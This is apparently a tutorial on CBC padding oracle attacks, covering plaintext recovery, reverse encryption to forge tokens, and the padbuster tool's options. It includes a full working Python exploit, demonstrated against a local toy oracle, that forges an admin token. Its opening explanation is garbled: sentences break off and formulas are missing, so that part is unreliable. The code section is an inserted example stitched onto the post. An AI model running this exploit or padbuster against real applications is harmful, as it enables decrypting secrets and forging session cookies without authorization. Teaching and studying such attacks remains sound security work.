A padding oracle attack abuses information leaked by padding validation in order to decrypt an arbitrary message without knowing the key. For it to work, it requires a padding oracle: any system which, given a ciphertext, behaves observably differently depending on whether the decrypted plaintext has valid padding or not. The difference can be an explicit error message, but a different status code, a different error page or even a measurable timing difference is enough. For the sake of simplicity, you can think of it as sending an arbitrary ciphertext to a server and getting back "Success" when the corresponding plaintext has valid padding and "Failure" otherwise. Note that the ciphertexts you query the oracle with need not have meaningful plaintexts behind them, and you will not be generating them by encryption, but rather crafting them byte by byte so that each answer from the oracle tells you something about the plaintext.
Let's remind ourselves of how CBC decryption works by taking a simplified look at the last two blocks:
The last ciphertext
Now, let's imagine a second scenario, where 0x01
.
Since we didn't change 0x01
to obtain the value of
Since 0x0202
.
We already know 0x01
with each new block.
Apart from allowing you to decrypt a ciphertext, a padding oracle vulnerability can also allow you to encrypt (almost) any plaintext: the only constraints are that the plaintext must end in valid padding, and that if you do not control the IV, the first block is out of your hands. This could be useful, for example, when you need to turn a plaintext cookie into a ciphertext the application will accept, but you don't have the key.
First of all you will need to choose the plaintext you want to encrypt, 0x0808080808080808
).
We now XOR these together to obtain
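Both halves of the attack described above, recovering a plaintext from the oracle and then running the procedure backwards to forge a ciphertext for a chosen plaintext, as an added worked example that is not part of the original post. It makes several assumptions: a toy hash-based Feistel cipher stands in for AES (the attack code only relies on CBC chaining and PKCS#7 padding and never looks inside the block cipher, so it is unchanged for AES), the victim's padding_oracle treats the first block of what it receives as the IV, and the token strings are constructed sample data. All function names are mine.

```python
import hashlib
import os

BLOCK = 16
KEY = os.urandom(BLOCK)   # victim's secret; the attacker functions below never read it

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def _f(key, half, rnd):
    # Round function of a toy 4-round Feistel cipher standing in for AES.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, right, rnd))
    return left + right
def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, left, rnd)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n
def pkcs7_unpad(data):
    n = data[-1] if data else 0   # the ValueError below is the one bit the oracle leaks
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out
def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        out += _xor(block_decrypt(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    return out

def padding_oracle(ciphertext):
    # The victim: treats the first block as the IV and answers only "valid padding?"
    try:
        pkcs7_unpad(cbc_decrypt(KEY, ciphertext[:BLOCK], ciphertext[BLOCK:]))
        return True
    except ValueError:
        return False

def recover_intermediate(oracle, target):
    # Recover I = D_k(target) byte by byte; plaintext is I XOR the preceding block.
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos                        # padding value being forced
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):          # known bytes made to decrypt to pad
            forged[j] = inter[j] ^ pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # Last byte: a hit may be 0x02 0x02 (etc.) rather than 0x01. Disturbing
                # the byte before it leaves only a genuine 0x01 valid.
                probe = bytes(forged[:-2]) + bytes([forged[-2] ^ 1, guess])
                if not oracle(probe + target):
                    continue
            inter[pos] = guess ^ pad
            break
    return bytes(inter)

def oracle_decrypt(oracle, ciphertext):
    # Decrypt IV||C1..Cn with nothing but the oracle.
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(recover_intermediate(oracle, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)

def oracle_encrypt(oracle, plaintext):
    # Reverse attack: choose the last block freely, then work backwards to the IV.
    padded = pkcs7_pad(plaintext)
    cipher = [bytes(BLOCK)]
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        inter = recover_intermediate(oracle, cipher[0])
        cipher.insert(0, _xor(inter, padded[i:i + BLOCK]))   # C_{i-1}, finally the IV
    return b"".join(cipher)

def demo(secret=b"user=guest;role=user"):
    # Victim issues a token (constructed sample); attacker reads it, then forges one.
    iv = os.urandom(BLOCK)
    token = iv + cbc_encrypt(KEY, iv, pkcs7_pad(secret))
    recovered = oracle_decrypt(padding_oracle, token)
    forged = oracle_encrypt(padding_oracle, b"user=admin;role=admin")
    return recovered, pkcs7_unpad(cbc_decrypt(KEY, forged[:BLOCK], forged[BLOCK:]))
```

Running demo() shows the attacker reading the guest token and then producing a token that decrypts to the admin string, with at most 256 oracle queries per byte. The check on the last byte matters in practice: when the forged block happens to decrypt to a trailing 0x02 0x02 the oracle also says "valid", and without the extra probe the recovered intermediate byte would be wrong and every later byte of that block with it. Because the forged ciphertext here carries its own IV as the first block, every plaintext block is under the attacker's control; with a fixed server-side IV the first block would not be.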
padbuster
padbuster is a tool written in Perl which is designed to automate padding oracle attacks. It is included in Kali Linux, but you can also find it at https://github.com/AonCyberLabs/PadBuster.
Its syntax is fairly simple. The first three arguments are positional: the URL of the padding oracle, then the ciphertext, then the block size, followed by any options you might wish to use. If you don't provide padbuster with an error string through -error, it will perform response analysis on its own and prompt you to select which response is the error one. For example, I have a padding oracle which displays either "Success!" or "Fail!" on the response page. As you can see in the screenshot, padbuster's response analysis automatically picked up on that and asked me which response is the error.
You might also need to change the encoding that padbuster uses, depending on how the padding oracle accepts data. Here, -encoding 1 means that I want the requests to carry the malicious ciphertexts as lowercase hex. The -noiv flag tells padbuster that the provided ciphertext does NOT include an IV. If you skip it, the first ciphertext block will be treated as the IV and won't be decrypted. Bear in mind that the first plaintext block is the decryption of the first ciphertext block XORed with the IV, so without the real IV that block cannot be recovered correctly no matter which flag you use.
After you give it the correct error response, it will perform the attack and decrypt your ciphertext.
Furthermore, padbuster is capable of encrypting a plaintext by mounting a reverse padding oracle attack. This is done through the -plaintext [plaintext] flag:
Unfortunately, if you don't know the IV, the first block will decrypt to garbage: every other plaintext block is XORed with a ciphertext block you chose, but the first one is XORed with the IV, which you cannot compensate for if the application uses an IV you neither know nor control.
Note that in the above screenshot the hex shown is the decryption of the ciphertext generated by padbuster, not the ciphertext itself.